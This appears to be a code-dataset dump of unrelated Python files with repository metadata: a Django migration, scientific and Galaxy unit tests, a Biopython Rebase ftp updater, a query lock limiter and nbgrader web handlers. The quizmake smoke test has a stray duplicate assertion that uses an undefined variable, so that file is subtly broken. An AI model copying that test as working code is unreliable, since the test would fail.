        if number >= sum(self.getNumOperationalServers()): return 0
        if number > self.getNumOperationalServers()[type]: return 0
        else:
            self.servers = [otherInstances for otherInstances in self.servers if otherInstances.type != type] +\
                sorted([requestedInstance for requestedInstance in self.servers if requestedInstance.type == type], key=lambda x: (self.currentTime - x.setupTime))[number:]

    def startEC2(self, number=1, type=0):
        self.__startServer__(number=number, type=type, failureProbability=self.failureProbabilities[type])

    def startSpot(self, number=1, type=1):
        self.__startServer__(number=number, type=type, failureProbability=self.failureProbabilities[type])

    def stopEC2(self, number=1, type = 0):
        self.__stopServer__(number=number, type=type)

    def stopSpot(self, number=1, type = 1):
        self.__stopServer__(number=number, type=type)
| 40.436123 | 183 | 0.636562 |
795ad758b47f5c7369bfbaec00fac6651a04abfb | 426 | py | Python | tenants/migrations/0002_auto_20190521_0816.py | epineda/chatter | de968687dfe88ace589cece7ba5259078a428120 | [
"MIT"
] | 86 | 2018-11-15T14:43:57.000Z | 2022-03-28T05:57:08.000Z | tenants/migrations/0002_auto_20190521_0816.py | alexsilva/chatter | 28869bcc6366846d8d58d9fbea0fb67fec58c8de | [
"MIT"
] | 34 | 2019-02-11T07:01:07.000Z | 2021-06-04T21:47:57.000Z | tenants/migrations/0002_auto_20190521_0816.py | alexsilva/chatter | 28869bcc6366846d8d58d9fbea0fb67fec58c8de | [
"MIT"
] | 39 | 2018-11-02T13:04:38.000Z | 2021-12-15T03:04:00.000Z | # Generated by Django 2.0.9 on 2019-05-21 08:16
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the trial-tracking fields ('on_trial', 'paid_until') from Client."""

    dependencies = [
        ('tenants', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='client',
            name='on_trial',
        ),
        migrations.RemoveField(
            model_name='client',
            name='paid_until',
        ),
    ]
| 19.363636 | 47 | 0.553991 |
795ad7a6c076c720f4d39aac621b9781a6baca7f | 347 | py | Python | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | 1 | 2021-06-21T21:51:44.000Z | 2021-06-21T21:51:44.000Z | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | 8 | 2020-06-19T13:30:57.000Z | 2021-04-15T20:07:33.000Z | tests/smoke_tests/smoke_test.py | jnguyen1098/quizmake | 760f59b06b3c574ac176305deeaa13d077080e64 | [
"0BSD"
] | null | null | null | # !/usr/bin/env python3
"""
Execute smoke test cases.
Testing to see if the system works
"""
from quizmake import core
def test_sanity() -> None:
    """Smoke-test the CLI entry point against known-good fixture data."""
    argv = ["prog"]
    argv.append("tests/test_data/tokens/valid_tokens/")
    argv.append("tests/test_data/questions/valid_questions/")
    assert core.main(argv) == 0
assert core.main(args) == 0
| 17.35 | 53 | 0.619597 |
795ad8e07adb09480349389672006ff53988dce7 | 632 | py | Python | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | tests/compatibility.py | ecoinvent/brightway2-data | 3aa42d93cb6ded0e8a8cb4162c052995ac7060d3 | [
"BSD-3-Clause"
] | null | null | null | from bw2data.tests import BW2DataTest, bw2test
from bw2data import *
from .fixtures import food, biosphere
@bw2test
def test_repr_str_unicode() -> None:
    """Every core bw2data object must have a truthy repr/str and be printable."""
    candidates = [
        geomapping,
        databases,
        methods,
        normalizations,
        weightings,
        Database("foo"),
        DataStore("foo"),
        projects,
    ]
    for candidate in candidates:
        assert repr(candidate)
        assert str(candidate)
        print(candidate)
@bw2test
def test_registered_database_repr() -> None:
    """A written Database must expose a usable repr/str and survive print()."""
    db = Database("biosphere")
    db.write(biosphere)
    assert repr(db)
    assert str(db)
    # print() exercises the same paths as a user inspecting the object.
    print(db)
| 19.75 | 50 | 0.615506 |
795ad94b286a2911d72bc46f9e37e09783767df8 | 1,523 | py | Python | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | textgrid_to_boris/boris_tools.py | Nagasaki45/textgrid-to-boris | e924a2a6196baf6967ccbc6ef1124d98bb9bcff8 | [
"MIT"
] | null | null | null | import collections
from datetime import datetime
import json
import operator
# One scored observation event. The last three fields ('type', 'modifier',
# 'comment') default to the empty string, so Event(time, subject, code) works.
Event = collections.namedtuple(
    'Event',
    ['time', 'subject', 'code', 'type', 'modifier', 'comment'],
    defaults=['', '', ''],
)
def read_boris(filepath):
    """Load a BORIS project file (JSON) and return the parsed object."""
    # TODO input validation
    with open(filepath) as boris_file:
        contents = boris_file.read()
    return json.loads(contents)
def write_boris(boris, filepath):
    """Serialize *boris* as JSON to *filepath*, overwriting any existing file."""
    serialized = json.dumps(boris)
    with open(filepath, 'w') as boris_file:
        boris_file.write(serialized)
def get_behavior_by_code(boris, code):
    """Return the behavior config whose 'code' field equals *code*.

    Raises ValueError when no configured behavior matches.
    """
    matching = [b for b in boris['behaviors_conf'].values() if b['code'] == code]
    if matching:
        return matching[0]
    raise ValueError(f'Behavior doesn\'t exist: "{code}"')
def get_subject_by_name(boris, name):
    """Return the subject config whose 'name' field equals *name*.

    Raises ValueError when no configured subject matches.
    """
    matching = [s for s in boris['subjects_conf'].values() if s['name'] == name]
    if matching:
        return matching[0]
    raise ValueError(f'Subject doesn\'t exist: "{name}"')
def create_event(start_time, behavior_code, subject_name):
    """Build an Event for *subject_name* performing *behavior_code* at *start_time*."""
    return Event(time=start_time, subject=subject_name, code=behavior_code)
def create_observation(events, timestamp):
    """Assemble a BORIS 'LIVE' observation dict from *events* at *timestamp*."""
    when = datetime.fromtimestamp(timestamp)
    ordered_events = sorted(events, key=operator.attrgetter('time'))
    # BORIS expects eight (initially empty) media-file slots.
    empty_file_slots = {slot: [] for slot in range(1, 9)}
    return {
        'events': ordered_events,
        # LIVE observations need no media attached; the user can add it later.
        'type': 'LIVE',
        'date': when.isoformat(),
        'description': '',
        'time offset': 0,
        'file': empty_file_slots,
    }
def add_observation(boris, name, observation):
    """Insert *observation* under *name* and return the mutated project dict."""
    observations = boris['observations']
    observations[name] = observation
    return boris
| 25.813559 | 67 | 0.632305 |
795ad9d93d1688c2dc1bf770a7e4d93b2b2414dd | 4,343 | py | Python | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | 2 | 2019-11-21T02:34:52.000Z | 2021-02-14T07:47:43.000Z | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | null | null | null | Scripts/Restriction/rebase_update.py | rwst/biopython | d8280b25e3fefdf7aebb7700a7080879a4146200 | [
"BSD-3-Clause"
] | 1 | 2019-04-12T20:52:12.000Z | 2019-04-12T20:52:12.000Z | #!/usr/bin/env python
#
# Restriction Analysis Libraries.
# Copyright (C) 2004. Frederic Sohm.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
"""Update the Rebase EMBOSS files.
The Rebase EMBOSS files are used by `ranacompiler.py` to build the updated
`Restriction_Dictionary.py` module for `Bio.Restriction`.
"""
from __future__ import print_function
import os
import sys
import time
import optparse
try:
from urllib import FancyURLopener, urlcleanup
except ImportError:
# Python 3
from urllib.request import FancyURLopener, urlcleanup
from Bio.Restriction.RanaConfig import ftp_proxy, ftp_Rebase, Rebase_name
from Bio.Restriction.RanaConfig import ftp_emb_e, ftp_emb_s, ftp_emb_r
class RebaseUpdate(FancyURLopener):
    """Downloads the current Rebase EMBOSS files over ftp (optionally via a proxy)."""

    def __init__(self, ftpproxy=''):
        """RebaseUpdate([ftpproxy]) -> new RebaseUpdate instance.

        if ftpproxy is not given RebaseUpdate uses the corresponding
        variable from RanaConfig.

        ftpproxy is the proxy to use if any.
        """
        proxy = {'ftp': ftpproxy or ftp_proxy}
        if not Rebase_name:
            raise FtpNameError('Rebase')
        if not proxy['ftp']:
            proxy = {}
        FancyURLopener.__init__(self, proxy)

    def openRebase(self, name=ftp_Rebase):
        """Open a connection to the Rebase ftp server (exits on failure)."""
        print('\n Please wait, trying to connect to Rebase\n')
        try:
            self.open(name)
        except Exception:
            raise ConnectionError('Rebase')
        return

    def getfiles(self, *files):
        """Download the given Rebase files (default: current emboss_e/s/r) to cwd."""
        for file in self.update(*files):
            print('copying %s' % file)
            fn = os.path.basename(file)
            # filename = os.path.join(Rebase, fn)
            filename = os.path.join(os.getcwd(), fn)
            print('to %s' % filename)
            try:
                self.retrieve(file, filename)
                # The following line is a workaround for an urllib bug in
                # Python 2.7.11 - 2.7.xx (?). It does not seem to work on
                # Python 3.xx. Try to remove the line in new Python versions.
                urlcleanup()
            except IOError as e:
                print(e)
                print('This error is probably due to a non-solved ftp bug in '
                      'recent Python versions. Please download the emboss '
                      'files manually from http://rebase.neb.com/rebase/'
                      'rebase.f37.html and then run ranacompiler.py. Find '
                      'more details in the Restriction manual.')
                self.close()
                return
        self.close()
        return

    def localtime(self):
        # Rebase names its monthly files with a single-digit year plus a
        # zero-padded month (e.g. "904" for April 2019).
        t = time.gmtime()
        year = str(t.tm_year)[-1]
        month = str(t.tm_mon)
        if len(month) == 1:
            month = '0' + month
        return year + month

    def update(self, *files):
        """Return the file URLs with '###' replaced by the current year/month tag."""
        if not files:
            files = [ftp_emb_e, ftp_emb_s, ftp_emb_r]
        return [x.replace('###', self.localtime()) for x in files]

    def __del__(self):
        # Close the connection if one was ever opened.
        if hasattr(self, 'tmpcache'):
            self.close()
        #
        # self.tmpcache is created by URLopener.__init__ method.
        #
        return
class FtpNameError(ValueError):
    """Raised when no Rebase server name is configured.

    NOTE(review): printing and calling sys.exit() from __init__ means the
    process terminates as soon as this exception is instantiated; it is
    never actually propagated to a caller.
    """
    def __init__(self, which_server):
        print(" In order to connect to %s ftp server, you must provide a name.\
\n Please edit Bio.Restriction.RanaConfig\n" % which_server)
        sys.exit()
class ConnectionError(IOError):
    """Raised when the ftp connection cannot be established.

    NOTE(review): this shadows the Python 3 builtin ConnectionError, and like
    FtpNameError it prints and exits from __init__ instead of propagating.
    """
    def __init__(self, which_server):
        print('\
\n Unable to connect to the %s ftp server, make sure your computer\
\n is connected to the internet and that you have correctly configured\
\n the ftp proxy.\
\n Use the --proxy switch to enter the address of your proxy\
\n' % which_server)
        sys.exit()
if __name__ == '__main__':
    # Parse the single supported option (--proxy), connect to the Rebase ftp
    # server and download the current emboss files into the working directory.
    parser = optparse.OptionParser()
    add = parser.add_option
    add('-p', '--proxy',
        action="store",
        dest='ftp_proxy',
        default='',
        help="set the proxy to be used by the ftp connection.")
    (option, args) = parser.parse_args()
    Getfiles = RebaseUpdate(option.ftp_proxy)
    Getfiles.openRebase()
    Getfiles.getfiles()
    Getfiles.close()
    sys.exit()
| 30.159722 | 79 | 0.602809 |
795ada6783c96cf515117e4563abfebc7a56a01c | 2,023 | py | Python | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | 2 | 2019-06-11T09:57:16.000Z | 2019-06-11T10:02:13.000Z | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | null | null | null | my_django_tweaks/test_utils/lock_limiter.py | ricard33/my_django_tweaks | 6f96a778515c194d8790dc02aa186a8c7b7b2e47 | [
"MIT"
] | null | null | null | from contextlib import contextmanager
from django.conf import settings
from django.db.models.sql.compiler import SQLCompiler
class WouldSelectMultipleTablesForUpdate(Exception):
    """Raised when a SELECT ... FOR UPDATE would lock more than one table."""
    pass
def replacement_as_sql(self, *args, **kwargs):
    """Patched SQLCompiler.as_sql that rejects non-whitelisted multi-table FOR UPDATE queries."""
    sql = self.query_lock_limiter_old_as_sql(*args, **kwargs)
    # Inspect table usage only after as_sql has run: at that point the query
    # is guaranteed to have gathered complete information about its tables.
    table_names = list(self.query.table_map.keys())
    locks_multiple_tables = self.query.select_for_update and len(table_names) > 1
    if locks_multiple_tables:
        if sorted(table_names) not in self.query_lock_limiter_whitelist:
            raise WouldSelectMultipleTablesForUpdate(
                f"Query would select_for_update more than one table: {sql}. "
                f"Add {table_names} to settings.TEST_SELECT_FOR_UPDATE_WHITELISTED_TABLE_SETS "
                f"to allow it."
            )
    return sql
def patch_sqlcompiler(whitelisted_table_sets):
    """Install the lock-limiting as_sql wrapper onto SQLCompiler."""
    # Keep a handle on the original so unpatch_sqlcompiler can restore it.
    SQLCompiler.query_lock_limiter_old_as_sql = SQLCompiler.as_sql
    SQLCompiler.as_sql = replacement_as_sql
    # Normalize each whitelisted table set to sorted order for comparison.
    normalized = []
    for tables in whitelisted_table_sets:
        normalized.append(sorted(tables))
    SQLCompiler.query_lock_limiter_whitelist = normalized
def unpatch_sqlcompiler():
    """Restore the original SQLCompiler.as_sql and drop the saved handle."""
    original = SQLCompiler.query_lock_limiter_old_as_sql
    SQLCompiler.as_sql = original
    delattr(SQLCompiler, "query_lock_limiter_old_as_sql")
@contextmanager
def query_lock_limiter(enable=False, whitelisted_table_sets=None):
    """Context manager that makes multi-table SELECT ... FOR UPDATE queries fail.

    Enabled when *enable* is True or settings.TEST_SELECT_FOR_UPDATE_LIMITER_ENABLED
    is set. *whitelisted_table_sets* (falling back to
    settings.TEST_SELECT_FOR_UPDATE_WHITELISTED_TABLE_SETS) lists table sets
    that are allowed to be locked together.

    The default was changed from ``[]`` to ``None`` to avoid a mutable
    default argument; ``None`` behaves identically since the value is only
    used via truthiness below.
    """
    enabled = enable or getattr(
        settings, "TEST_SELECT_FOR_UPDATE_LIMITER_ENABLED", False
    )
    if not enabled:
        yield
        return
    # Support nesting: only the outermost context patches and unpatches.
    was_already_patched = hasattr(SQLCompiler, "query_lock_limiter_old_as_sql")
    if not was_already_patched:
        whitelist = whitelisted_table_sets or getattr(
            settings, "TEST_SELECT_FOR_UPDATE_WHITELISTED_TABLE_SETS", []
        )
        patch_sqlcompiler(whitelist)
    try:
        yield
    finally:
        if not was_already_patched:
            unpatch_sqlcompiler()
| 34.288136 | 95 | 0.723678 |
795adad02d040438e8a8f5e3ad983a59632c6d1e | 163 | py | Python | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | utis/__init__.py | momoladebrouill/utis | d3abecc7a0a1467d5dc3a2be566cef26efc1fa70 | [
"MIT"
] | null | null | null | from .plan import Table,Plan
from .html import Balise
from .Fractions import Frac
from .complex import Complex
from .AntsFight import Ant
from .vec import Pos,Vec
| 23.285714 | 28 | 0.803681 |
795add4e55a3cad41c707acef472fe9668a59092 | 12,444 | py | Python | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | test/unit/managers/test_HistoryContentsManager.py | bornea/galaxy-apostl-docker | e75d27103d9c48e4925708fd06b585cb5471382e | [
"CC-BY-3.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
import os
import imp
import unittest
import random
test_utils = imp.load_source( 'test_utils',
os.path.join( os.path.dirname( __file__), '../unittest_utils/utility.py' ) )
from sqlalchemy import true
from sqlalchemy import false
from sqlalchemy import desc
from sqlalchemy.sql import text
from base import BaseTestCase
from base import CreatesCollectionsMixin
from galaxy.managers.histories import HistoryManager
from galaxy.managers import hdas
from galaxy.managers import collections
from galaxy.managers import history_contents
# Fixture credentials for the users created by the tests below.
default_password = '123456'
user2_data = dict( email='user2@user2.user2', username='user2', password=default_password )
user3_data = dict( email='user3@user3.user3', username='user3', password=default_password )
user4_data = dict( email='user4@user4.user4', username='user4', password=default_password )
# =============================================================================
class HistoryAsContainerTestCase( BaseTestCase, CreatesCollectionsMixin ):
    """Tests the HistoryContentsManager: listing, filtering and ordering the
    HDAs and dataset collections (HDCAs) contained in a history."""

    def set_up_managers( self ):
        # Build the managers used by every test below.
        super( HistoryAsContainerTestCase, self ).set_up_managers()
        self.history_manager = HistoryManager( self.app )
        self.hda_manager = hdas.HDAManager( self.app )
        self.collection_manager = collections.DatasetCollectionManager( self.app )
        self.contents_manager = history_contents.HistoryContentsManager( self.app )

    def add_hda_to_history( self, history, **kwargs ):
        """Create a fresh dataset and wrap it in an HDA attached to *history*."""
        dataset = self.hda_manager.dataset_manager.create()
        hda = self.hda_manager.create( history=history, dataset=dataset, **kwargs )
        return hda

    def add_list_collection_to_history( self, history, hdas, name='test collection', **kwargs ):
        """Create a 'list' dataset collection over *hdas* inside *history*."""
        hdca = self.collection_manager.create( self.trans, history, name, 'list',
            element_identifiers=self.build_element_identifiers( hdas ) )
        return hdca

    def test_contents( self ):
        # contents() should return HDAs (hid order) and collections together.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )

        self.log( "calling contents on an empty history should return an empty list" )
        self.assertEqual( [], list( self.contents_manager.contents( history ) ) )

        self.log( "calling contents on an history with hdas should return those in order of their hids" )
        hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
        random.shuffle( hdas )
        ordered_hda_contents = list( self.contents_manager.contents( history ) )
        self.assertEqual( map( lambda hda: hda.hid, ordered_hda_contents ), [ 1, 2, 3 ] )

        self.log( "calling contents on an history with both hdas and collections should return both" )
        hdca = self.add_list_collection_to_history( history, hdas )
        all_contents = list( self.contents_manager.contents( history ) )
        self.assertEqual( all_contents, list( ordered_hda_contents ) + [ hdca ] )

    def test_contained( self ):
        # contained() should return only the HDAs, never collections.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )

        self.log( "calling contained on an empty history should return an empty list" )
        self.assertEqual( [], list( self.contents_manager.contained( history ) ) )

        self.log( "calling contained on an history with both hdas and collections should return only hdas" )
        hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
        self.add_list_collection_to_history( history, hdas )
        self.assertEqual( list( self.contents_manager.contained( history ) ), hdas )

    def test_subcontainers( self ):
        # subcontainers() should return only the collections, never HDAs.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )

        self.log( "calling subcontainers on an empty history should return an empty list" )
        self.assertEqual( [], list( self.contents_manager.subcontainers( history ) ) )

        self.log( "calling subcontainers on an history with both hdas and collections should return only collections" )
        hdas = [ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ]
        hdca = self.add_list_collection_to_history( history, hdas )
        subcontainers = list( self.contents_manager.subcontainers( history ) )
        self.assertEqual( subcontainers, [ hdca ] )

    def test_limit_and_offset( self ):
        # limit/offset should page through the mixed hda+collection listing.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )
        contents = []
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )

        # _subquery = self.contents_manager._contents_common_query( self.contents_manager.subcontainer_class, history.id )
        # _subquery = self.contents_manager._contents_common_query( self.contents_manager.contained_class, history.id )
        # print _subquery
        # for row in _subquery.all():
        #     print row

        self.log( "should be able to limit and offset" )
        results = self.contents_manager.contents( history )
        # print [ r.id for r in results ]
        # print '--'
        # print [ c.id for c in contents ]
        self.assertEqual( results, contents )

        self.assertEqual( self.contents_manager.contents( history, limit=4 ), contents[0:4] )
        self.assertEqual( self.contents_manager.contents( history, offset=3 ), contents[3:] )
        self.assertEqual( self.contents_manager.contents( history, limit=4, offset=4 ), contents[4:8] )

        self.assertEqual( self.contents_manager.contents( history, limit=0 ), [] )
        self.assertEqual( self.contents_manager.contents( history, offset=len( contents ) ), [] )

    def test_orm_filtering( self ):
        # filters= should accept both raw SQL text and SQLAlchemy expressions.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )
        contents = []
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )

        self.log( "should allow filter on deleted" )
        self.hda_manager.delete( contents[1] )
        self.hda_manager.delete( contents[4] )
        contents[6].deleted = True
        deleted = [ contents[1], contents[4], contents[6] ]
        self.app.model.context.flush()

        # TODO: cross db compat?
        filters = [ text( 'deleted = 1' ) ]
        # for content in self.contents_manager.contents( history, filters=filters ):
        #     print content.hid, content.history_content_type, content.id, content.name
        self.assertEqual( self.contents_manager.contents( history, filters=filters ), deleted )

        # even stranger that sqlalx can use the first model in the union (HDA) for columns across the union
        HDA = self.hda_manager.model_class
        self.assertEqual( self.contents_manager.contents( history,
            filters=[ HDA.deleted == true() ] ), deleted )
        filter_limited_contents = self.contents_manager.contents( history,
            filters=[ HDA.deleted == true() ], limit=2, offset=1 )
        self.assertEqual( filter_limited_contents, deleted[1:] )

        self.log( "should allow filter on visible" )
        contents[2].visible = False
        contents[5].visible = False
        contents[6].visible = False
        invisible = [ contents[2], contents[5], contents[6] ]
        # for content in invisible:
        #     print content.id, content.__class__.__name__, content
        self.app.model.context.flush()

        filters = [ text( 'visible = 0' ) ]
        self.assertEqual( self.contents_manager.contents( history, filters=filters ), invisible )
        self.assertEqual( self.contents_manager.contents( history,
            filters=[ HDA.visible == false() ] ), invisible )
        filter_limited_contents = self.contents_manager.contents( history,
            filters=[ HDA.visible == false() ], limit=2, offset=1 )
        self.assertEqual( filter_limited_contents, invisible[1:] )

        self.log( "should allow filtering more than one attribute" )
        deleted_and_invisible = [ contents[6] ]
        filters = [ text( 'deleted = 1' ), text( 'visible = 0' ) ]
        self.assertEqual( self.contents_manager.contents( history, filters=filters ), deleted_and_invisible )
        self.assertEqual( self.contents_manager.contents( history,
            filters=[ HDA.deleted == true(), HDA.visible == false() ] ), deleted_and_invisible )
        offset_too_far = self.contents_manager.contents( history,
            filters=[ HDA.deleted == true(), HDA.visible == false() ], limit=2, offset=1 )
        self.assertEqual( offset_too_far, [] )

        self.log( "should allow filtering more than one attribute" )
        deleted_and_invisible = [ contents[6] ]
        # note the two syntaxes both work
        self.assertEqual( self.contents_manager.contents( history,
            filters=[ text( 'deleted = 1' ), text( 'visible = 0' ) ] ), deleted_and_invisible )
        self.assertEqual( self.contents_manager.contents( history,
            filters=[ HDA.deleted == true(), HDA.visible == false() ] ), deleted_and_invisible )
        offset_too_far = self.contents_manager.contents( history,
            filters=[ HDA.deleted == true(), HDA.visible == false() ], limit=2, offset=1 )
        self.assertEqual( offset_too_far, [] )

        self.log( "should allow filtering using like" )
        # find 'hda-4'
        self.assertEqual( [ contents[4] ],
            self.contents_manager.contents( history, filters=[ HDA.name.like( '%-4' ) ] ) )
        # the collections added above have the default name 'test collection'
        self.assertEqual( self.contents_manager.subcontainers( history ),
            self.contents_manager.contents( history, filters=[ HDA.name.like( '%collect%' ) ] ) )

    def test_order_by( self ):
        # order_by should support hid (default), create_time and update_time.
        user2 = self.user_manager.create( **user2_data )
        history = self.history_manager.create( name='history', user=user2 )
        contents = []
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 3 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[:3] ) )
        contents.extend([ self.add_hda_to_history( history, name=( 'hda-' + str( x ) ) ) for x in xrange( 4, 6 ) ])
        contents.append( self.add_list_collection_to_history( history, contents[4:6] ) )

        self.log( "should default to hid order_by" )
        self.assertEqual( self.contents_manager.contents( history ), contents )

        self.log( "should allow asc, desc order_by" )
        self.assertEqual( self.contents_manager.contents( history, order_by=desc( 'hid' ) ), contents[::-1] )

        def get_create_time( item ):
            # HDCAs keep create_time on their wrapped collection.
            create_time = getattr( item, 'create_time', None )
            if not create_time:
                create_time = item.collection.create_time
            return create_time

        self.log( "should allow create_time order_by" )
        newest_first = sorted( contents, key=get_create_time, reverse=True )
        results = self.contents_manager.contents( history, order_by=desc( 'create_time' ) )
        self.assertEqual( newest_first, results )

        self.log( "should allow update_time order_by" )
        # change the oldest created to update the update_time
        contents[0].name = 'zany and/or wacky'
        self.app.model.context.flush()
        results = self.contents_manager.contents( history, order_by=desc( 'update_time' ) )
        self.assertEqual( contents[0], results[0] )
# =============================================================================
# Allow running this module directly with the stdlib test runner.
if __name__ == '__main__':
    # or more generally, nosetests test_resourcemanagers.py -s -v
    unittest.main()
| 52.285714 | 122 | 0.658952 |
795add50370a966d27392a6f16f18d6da45d3a9f | 3,160 | py | Python | nbgrader/server_extensions/formgrader/base.py | omelnikov/nbgrader | 66984e5732c98bd15733c027601a62fca6a46222 | [
"BSD-3-Clause"
] | 1,116 | 2015-01-20T19:22:24.000Z | 2022-03-31T22:05:10.000Z | nbgrader/server_extensions/formgrader/base.py | jld23/nbgrader | 07a38cd8ed12ab33870bdd42f0bf35aa1252b0db | [
"BSD-3-Clause"
] | 1,166 | 2015-01-08T21:50:31.000Z | 2022-03-31T05:15:01.000Z | nbgrader/server_extensions/formgrader/base.py | jld23/nbgrader | 07a38cd8ed12ab33870bdd42f0bf35aa1252b0db | [
"BSD-3-Clause"
] | 337 | 2015-02-06T01:28:00.000Z | 2022-03-29T06:52:38.000Z | import os
import json
import functools
from tornado import web
from notebook.base.handlers import IPythonHandler
from ...api import Gradebook
from ...apps.api import NbGraderAPI
class BaseHandler(IPythonHandler):
    """Base class for all formgrader web handlers.

    Exposes the nbgrader-specific objects stashed in the tornado
    application settings as convenience properties, and renders custom
    error pages for the status codes formgrader cares about.
    """

    @property
    def base_url(self):
        # Strip the trailing slash so handlers can safely append paths.
        return super(BaseHandler, self).base_url.rstrip("/")

    @property
    def db_url(self):
        """URL of the nbgrader gradebook database."""
        return self.settings['nbgrader_db_url']

    @property
    def url_prefix(self):
        return self.settings['nbgrader_url_prefix']

    @property
    def coursedir(self):
        return self.settings['nbgrader_coursedir']

    @property
    def authenticator(self):
        return self.settings['nbgrader_authenticator']

    @property
    def gradebook(self):
        """Lazily create (and cache in the app settings) the shared Gradebook."""
        gb = self.settings['nbgrader_gradebook']
        if gb is None:
            self.log.debug("creating gradebook")
            gb = Gradebook(self.db_url, self.coursedir.course_id)
            self.settings['nbgrader_gradebook'] = gb
        return gb

    @property
    def mathjax_url(self):
        return self.settings['mathjax_url']

    @property
    def exporter(self):
        return self.settings['nbgrader_exporter']

    @property
    def api(self):
        """Build a fresh NbGraderAPI wired to this app's course directory."""
        level = self.log.level
        api = NbGraderAPI(
            self.coursedir, self.authenticator, parent=self.coursedir.parent)
        api.log_level = level
        return api

    def render(self, name, **ns):
        """Render the named Jinja2 template with keyword arguments *ns*."""
        template = self.settings['nbgrader_jinja2_env'].get_template(name)
        return template.render(**ns)

    # Status codes we render custom pages for; 500 and 502 deliberately
    # share the same template.
    _error_templates = {
        500: 'base_500.tpl',
        502: 'base_500.tpl',
        403: 'base_403.tpl',
    }

    def write_error(self, status_code, **kwargs):
        """Render a custom error page for 500/502/403, else defer to tornado.

        Refactored: the original repeated an identical render call in
        each status-code branch.
        """
        template = self._error_templates.get(status_code)
        if template is None:
            return super(BaseHandler, self).write_error(status_code, **kwargs)
        html = self.render(
            template,
            base_url=self.base_url,
            error_code=status_code)
        self.write(html)
        self.finish()
class BaseApiHandler(BaseHandler):
    """Base class for JSON API handlers."""

    def get_json_body(self):
        """Return the body of the request as JSON data."""
        raw = self.request.body
        if not raw:
            return None
        text = raw.strip().decode('utf-8')
        try:
            return json.loads(text)
        except Exception:
            self.log.debug("Bad JSON: %r", text)
            self.log.error("Couldn't parse JSON", exc_info=True)
            raise web.HTTPError(400, 'Invalid JSON in body of request')
def check_xsrf(f):
    """Decorator: touch the handler's ``xsrf_token`` before calling *f*.

    Accessing the property triggers tornado's XSRF cookie handling as a
    side effect.
    """
    @functools.wraps(f)
    def wrapped(handler, *args, **kwargs):
        handler.xsrf_token  # property access is the whole point
        return f(handler, *args, **kwargs)
    return wrapped
def check_notebook_dir(f):
    """Decorator: short-circuit with a 500 page when the notebook
    directory was misconfigured at extension load time."""
    @functools.wraps(f)
    def guarded(handler, *args, **kwargs):
        if handler.settings['nbgrader_bad_setup']:
            return handler.write_error(500)
        return f(handler, *args, **kwargs)
    return guarded
| 26.554622 | 78 | 0.601899 |
795add9a8e07d6ce2f491c70297cd5f744cc080e | 10,912 | py | Python | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
